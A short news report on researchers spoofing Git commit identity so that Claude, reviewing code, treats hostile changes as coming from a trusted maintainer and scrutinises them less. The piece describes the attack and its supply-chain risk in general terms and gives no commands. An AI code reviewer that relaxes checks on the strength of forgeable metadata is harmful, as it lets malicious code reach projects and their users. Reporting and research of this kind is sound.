Git identity spoof fools Claude into giving bad code the nod

Security researchers have discovered a vulnerability in Anthropic's Claude AI that allows attackers to forge Git commit metadata and trick the system into approving malicious code. By using just two Git commands to spoof a trusted developer's identity, researchers demonstrated that Claude would review hostile code changes as though they came from a known maintainer, significantly lowering the AI's scrutiny of the modifications.

The attack exploits Claude's reliance on Git metadata to establish trust and determine the legitimacy of code changes. When the AI encounters commits appearing to come from established project maintainers, it applies less rigorous security analysis. The vulnerability highlights a fundamental weakness in how AI systems authenticate and validate information sources, particularly when that information comes from easily-manipulated external systems.

The findings underscore emerging security risks as AI systems are increasingly integrated into development workflows and decision-making processes. This vulnerability suggests that AI code reviewers could become vectors for supply chain attacks if they blindly trust metadata without independent verification. The research raises questions about how organizations should configure and deploy AI tools in sensitive environments where malicious actors might attempt to inject compromised code into critical projects.